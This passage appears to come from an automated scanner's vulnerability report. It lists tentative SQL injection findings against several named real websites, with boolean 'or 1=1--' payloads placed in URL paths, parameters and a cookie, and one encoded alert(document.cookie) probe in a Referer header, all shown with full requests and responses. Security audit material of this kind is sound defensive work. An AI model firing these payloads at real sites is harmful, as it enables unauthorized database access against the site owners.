<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

1.51. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [base_domain_98034c63917cb0c0c02f1b9429eaa593 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

The base_domain_98034c63917cb0c0c02f1b9429eaa593 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the base_domain_98034c63917cb0c0c02f1b9429eaa593 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Shopping/Clothing-Accessories/194367784/Clothing/8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com';

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:45:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<h5>Since its inception, Calvin Klein Underwear for Men and Women has led the market by offering consumers cutting-edge design, innovative fabrics, and exceptional fit and quality.</h5>
...[SNIP]...

Request 2

GET /Shopping/Clothing-Accessories/194367784/Clothing/8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com'';

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:46:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

1.52. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 18394333'%20or%201%3d1--%20 and 18394333'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /Shopping/Clothing-Accessories/19436778418394333'%20or%201%3d1--%20/Leather-Goods/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:18:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<iframe id='a8c465c4' name='a8c465c4' src='http://d1.openx.org/afr.php?n=a8c465c4&amp;zoneid=121958&amp;target=_blank&amp;cb=891208577' frameborder='0' scrolling='no' width='728' height='90' allowtransparency='true'></iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script><!--Leaderboard banner-->
</div>
<div class="cl">&nbsp;</div>
<div id="header">
<div id="navigation">
<ul>
<li><a class="resetmenu" href="#">things to do</a>
<div class="dropdown">
<div class="main-menu">
<ul class="col-3">
<li><a href="/ThingsToDo/Today">Today</a></li>
<li><a href="/ThingsToDo/ThisWeek">This Week</a></li>
<li><a href="#sub-menu-1thingstodo">All Things to Do</a></li>
<li><a href="#sub-menu-1movies">Movies</a></li>
<li><a href="#sub-menu-1justforkids">Just For Kids</a></li>
<li><a href="#sub-menu-1recreations">Fun & Recreation</a></li>
<li><a href="/chat">Chat Online</a></li>
<li><a href="/twitter">Explore Twitter</a></li>
<li><a href="/Online-Internet/Blogs">Visit Lebanese Blogs</a></li>
</ul>
</div>
<div id="sub-menu-1thingstodo" class="sub-menu">
<p class="main-btn" id="/ThingsToDo">All Things to Do <a href="#" class="return"></a></p>
<ul class="col-3">
<li><a href="/ThingsToDo/Exhibitions/6382333962">Exhibitions</a></li>
<li><a href="/ThingsToDo/Festivals/272910464">Festivals</a></li>
<li><a href="/ThingsToDo/Gatherings/9274143605">Gatherings</a></li>
<li><a href="/ThingsToDo/Live-Music/560568055">Live Music</a></li>
<li><a href="/ThingsToDo/Markets-and-Deals/0106299254">Markets & Deals</a></li>
<li><a href="/ThingsToDo/Parties/1690334">Parties</a></li>
<li><a href="/ThingsToDo/Performances/112730726">Performances</a></li>
<li><a href="/ThingsToDo/Screenings/60463877">Screenings</a></li>
<li><a href="/ThingsToDo/Seminars-and-Lectures/295390016">Seminars & Lectures</a></li>
<li><a href="/ThingsToDo/Theater/706796009">Theater</a></li>
<li><a href="/ThingsToDo/Workshops/7278901598">Workshops</a></li>
</ul></div><div id="sub-menu-1movies" class="sub-menu">
<p class="main-btn" id="/Movies">Movies <a href="#" class="return"></a></p>
<ul class="
...[SNIP]...

Request 2

GET /Shopping/Clothing-Accessories/19436778418394333'%20or%201%3d2--%20/Leather-Goods/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:18:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<iframe id='a8c465c4' name='a8c465c4' src='http://d1.openx.org/afr.php?n=a8c465c4&amp;zoneid=121958&amp;target=_blank&amp;cb=1522925385' frameborder='0' scrolling='no' width='728' height='90' allowtransparency='true'></iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script><!--Leaderboard banner-->
</div>
<div class="cl">&nbsp;</div>
<div id="header">
<div id="navigation">
<ul>
<li><a class="resetmenu" href="#">things to do</a>
<div class="dropdown">
<div class="main-menu">
<ul class="col-3">
<li><a href="/ThingsToDo/Today">Today</a></li>
<li><a href="/ThingsToDo/ThisWeek">This Week</a></li>
<li><a href="#sub-menu-1thingstodo">All Things to Do</a></li>
<li><a href="#sub-menu-1movies">Movies</a></li>
<li><a href="#sub-menu-1justforkids">Just For Kids</a></li>
<li><a href="#sub-menu-1recreations">Fun & Recreation</a></li>
<li><a href="/chat">Chat Online</a></li>
<li><a href="/twitter">Explore Twitter</a></li>
<li><a href="/Online-Internet/Blogs">Visit Lebanese Blogs</a></li>
</ul>
</div>
<div id="sub-menu-1thingstodo" class="sub-menu">
<p class="main-btn" id="/ThingsToDo">All Things to Do <a href="#" class="return"></a></p>
<ul class="col-3">
<li><a href="/ThingsToDo/Exhibitions/6382333962">Exhibitions</a></li>
<li><a href="/ThingsToDo/Festivals/272910464">Festivals</a></li>
<li><a href="/ThingsToDo/Gatherings/9274143605">Gatherings</a></li>
<li><a href="/ThingsToDo/Live-Music/560568055">Live Music</a></li>
<li><a href="/ThingsToDo/Markets-and-Deals/0106299254">Markets & Deals</a></li>
<li><a href="/ThingsToDo/Parties/1690334">Parties</a></li>
<li><a href="/ThingsToDo/Performances/112730726">Performances</a></li>
<li><a href="/ThingsToDo/Screenings/60463877">Screenings</a></li>
<li><a href="/ThingsToDo/Seminars-and-Lectures/295390016">Seminars & Lectures</a></li>
<li><a href="/ThingsToDo/Theater/706796009">Theater</a></li>
<li><a href="/ThingsToDo/Workshops/7278901598">Workshops</a></li>
</ul></div><div id="sub-menu-1movies" class="sub-menu">
<p class="main-btn" id="/Movies">Movies <a href="#" class="return"></a></p>
<ul class=
...[SNIP]...

1.53. http://www.beirut.com/images/loaders/big/purple-ajax-loader.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.beirut.com
Path:   /images/loaders/big/purple-ajax-loader.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 13824690'%20or%201%3d1--%20 and 13824690'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /images/loaders/big/purple-ajax-loader.gif13824690'%20or%201%3d1--%20 HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:27:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 62551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="stylesheet" href="/css/magenta-style.css" type="text/css" media="all" />
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Index';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
               
<script type='text/javascript' src='/js/jquery-libraries.js'></script>
<script src="/js/jquery.google-analytics.js" type="text/javascript"></script>

<script type="text/javascript" src="/js/jquery.jcarousel.js"></script><script type="text/javascript">
$.trackPage('UA-12545632-3')
</script>
<script src="/js/fnc.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="/css/magenta-jquery.autocomplete.css" />
</head>
<body >
<div id="wrapper">
<div id="shell">
<div id="site-top">&nbsp;</div>
<div id="site-bg">
<div class="left">
<div id="logo"><a href="/"><img title="Beirut.com" alt="Beirut.com" src="/css/images/beirut_logo_beta.png" width="198" height="65"></a></div>
<div class="cl">&nbsp;</div>
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
<script type="text/javascript">
function fbConnect() {
   FB.init("98034c63917cb0c0c02f1b9429eaa593", "/xd_receiver.htm");
   FB.init("98034c63917cb0c0c02f1b9429eaa593");
}
fbConnect();
function reloader(){
   location.reload(true);
}
</script>
<fb:login-button v="2" onlogin="update_user_box()" length="long" background="light" size="medium"></fb:login-button>
<script type="text/javascript">
   //FB.XFBML.Host.parseDomTree();
   //FB.XFBML.parse();
   function draw_FB_Login(){
       
       var url = "fb-login.php"; // ajax url
   
       $.ajax({
       type: "POST",
       url:url,
       data: "out=yes",
       success: function(msg){
       }
       });
       
       var msg = '<fb:login-button v="2" onlogin="update_user_box()" length="long" background="light" size="medium"></fb:login-button>
...[SNIP]...

Request 2

GET /images/loaders/big/purple-ajax-loader.gif13824690'%20or%201%3d2--%20 HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:27:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 62541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="stylesheet" href="/css/green-style.css" type="text/css" media="all" />
<script type="text/javascript">
var randstyle='green';
var indexpage='Index';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
               
<script type='text/javascript' src='/js/jquery-libraries.js'></script>
<script src="/js/jquery.google-analytics.js" type="text/javascript"></script>

<script type="text/javascript" src="/js/jquery.jcarousel.js"></script><script type="text/javascript">
$.trackPage('UA-12545632-3')
</script>
<script src="/js/fnc.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="/css/green-jquery.autocomplete.css" />
</head>
<body >
<div id="wrapper">
<div id="shell">
<div id="site-top">&nbsp;</div>
<div id="site-bg">
<div class="left">
<div id="logo"><a href="/"><img title="Beirut.com" alt="Beirut.com" src="/css/images/beirut_logo_beta.png" width="198" height="65"></a></div>
<div class="cl">&nbsp;</div>
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
<script type="text/javascript">
function fbConnect() {
   FB.init("98034c63917cb0c0c02f1b9429eaa593", "/xd_receiver.htm");
   FB.init("98034c63917cb0c0c02f1b9429eaa593");
}
fbConnect();
function reloader(){
   location.reload(true);
}
</script>
<fb:login-button v="2" onlogin="update_user_box()" length="long" background="light" size="medium"></fb:login-button>
<script type="text/javascript">
   //FB.XFBML.Host.parseDomTree();
   //FB.XFBML.parse();
   function draw_FB_Login(){
       
       var url = "fb-login.php"; // ajax url
   
       $.ajax({
       type: "POST",
       url:url,
       data: "out=yes",
       success: function(msg){
       }
       });
       
       var msg = '<fb:login-button v="2" onlogin="update_user_box()" length="long" background="light" size="medium"></fb:login-button>';
       
...[SNIP]...

1.54. http://www.dominionenterprises.com/main/do/Privacy_Policy [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Privacy_Policy

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/Privacy_Policy'%20and%201%3d1--%20 HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:03:11 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=9c634d66b48759ca834ca421efe5637e; expires=Thu, 27 Jan 2011 14:03:11 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 14:03:11 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Content-Length: 33701

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Privacy Policy</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Privacy Policy">
   <meta name="keywords" content="Privacy Policy">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />
       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-setup.js"></script>
<!-- SWFObject -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/swfobject.js"></script>
<!-- slider -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/slider.js"></script>
<!-- menu -->

...[SNIP]...

Request 2

GET /main/do/Privacy_Policy'%20and%201%3d2--%20 HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:03:11 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=fc1d68d00efcab2fb213ab705761f75a; expires=Thu, 27 Jan 2011 14:03:11 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 14:03:11 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 775
Connection: close
Content-Type: text/html

<br />
<b>Notice</b>: Undefined index: parentID in <b>/usr/local/apache2/htdocs/www/site/dbo/PageTemplateField.php</b> on line <b>38</b><br />
<br />
<b>Notice</b>: Undefined property: templateName in <b>/usr/local/apache2/htdocs/www/site/classes/Page.class.php</b> on line <b>1069</b><br />
<br />
<b>Notice</b>: Undefined property: templateFileName in <b>/usr/local/apache2/htdocs/www/site/classes/Page.class.php</b> on line <b>1069</b><br />
<br />
<b>Notice</b>: Undefined property: templateCssHeader in <b>/usr/local/apache2/htdocs/www/site/classes/Page.class.php</b> on line <b>1285</b><br />
<br />
<b>Warning</b>: Smarty error: unable to read resource: "" in <b>/usr/local/apache2/htdocs/www/third_party/smarty/Smarty.class.php</b> on line <b>1083</b><br />

1.55. http://www.flashedition.com/publication [i parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.flashedition.com
Path:   /publication

Issue detail

The i parameter appears to be vulnerable to SQL injection attacks. The payloads 13661187%20or%201%3d1--%20 and 13661187%20or%201%3d2--%20 were each submitted in the i parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /publication?i=5316213661187%20or%201%3d1--%20 HTTP/1.1
Host: www.flashedition.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 13:14:37 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
P3P: policyref="/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAo PSDo CONo TELo OUR DELo SAMo OTRo BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Set-Cookie: PHPSESSID=8ar88s2155addv5msvbctkoh35; expires=Tue, 25-Jan-2011 17:14:29 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: u_id=8ar88s2155addv5msvbctkoh35; expires=Wed, 25-Jan-2012 13:14:29 GMT
Set-Cookie: ie_warn=1; expires=Wed, 25-Jan-2012 13:14:29 GMT
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 8481

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<STYLE type=text/css>
#banner_btn
{
width: 10px;
height: 100%;
background-image:url(banner_btn.gif);
vertical-align: middle;
}

#banner_btn_hor
{
width: 100%;
height: 10px;
background-image:url(banner_btn_hor.gif);
}

#banner
{
overflow: hidden;
vertical-align: middle;
font-family: Georgia, "Times New Roman", Times, serif;
font-size: 12px;
}
#banner *
{
font-family: Lucida Grande, Segoe UI, Tahoma, sans-serif;
font-size: 12px;
color: #000000;
}
#banner a:link
{
color: #00688B;
text-decoration: none;
}
#banner a:visited
{
color: #00688B;
text-decoration: none;
}
#banner a:hover
{
color: #00688B;
text-decoration: underline;
}
#banner a:active
{
color: #00688B;
text-decoration: underline;
}
body {
   margin: 0px;
   padding: 0px;
}
#vert_text {
writing-mode: tb-rl;
filter: flipv fliph;
}
#logo_center_img
{
position: absolute;
margin: auto;
left: 0px;
top: 0px;
z-index: 100;
}

div.logo_center_img1
{
display:block;
position:absolute;
top:0;
left:0;
background:#ffffff;
z-index: -101;
width:100%;
height:100%;
}
</STYLE>

<title>brad pay test-DEL</title>
<script type="text/javascript" src="/js/s
...[SNIP]...

Request 2

GET /publication?i=5316213661187%20or%201%3d2--%20 HTTP/1.1
Host: www.flashedition.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 13:14:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding
Content-Length: 188
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

<html>
<head>
<title>Publication Not Available</title>
</head>
<body>
<h1>Publication Not Available</h1>
<p> The publication you requested is not available </p>
</body>
</html>

1.56. http://www.flashedition.com/publication [m parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.flashedition.com
Path:   /publication

Issue detail

The m parameter appears to be vulnerable to SQL injection attacks. The payloads 16103717%20or%201%3d1--%20 and 16103717%20or%201%3d2--%20 were each submitted in the m parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /publication?m=1219116103717%20or%201%3d1--%20&l=1 HTTP/1.1
Host: www.flashedition.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 13:14:37 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
P3P: policyref="/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAo PSDo CONo TELo OUR DELo SAMo OTRo BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Set-Cookie: PHPSESSID=sf7kaiktruee342efur467s290; expires=Tue, 25-Jan-2011 17:14:29 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: u_id=sf7kaiktruee342efur467s290; expires=Wed, 25-Jan-2012 13:14:29 GMT
Set-Cookie: ie_warn=1; expires=Wed, 25-Jan-2012 13:14:29 GMT
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 8486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<STYLE type=text/css>
#banner_btn
{
width: 10px;
height: 100%;
background-image:url(banner_btn.gif);
vertical-align: middle;
}

#banner_btn_hor
{
width: 100%;
height: 10px;
background-image:url(banner_btn_hor.gif);
}

#banner
{
overflow: hidden;
vertical-align: middle;
font-family: Georgia, "Times New Roman", Times, serif;
font-size: 12px;
}
#banner *
{
font-family: Lucida Grande, Segoe UI, Tahoma, sans-serif;
font-size: 12px;
color: #000000;
}
#banner a:link
{
color: #00688B;
text-decoration: none;
}
#banner a:visited
{
color: #00688B;
text-decoration: none;
}
#banner a:hover
{
color: #00688B;
text-decoration: underline;
}
#banner a:active
{
color: #00688B;
text-decoration: underline;
}
body {
   margin: 0px;
   padding: 0px;
}
#vert_text {
writing-mode: tb-rl;
filter: flipv fliph;
}
#logo_center_img
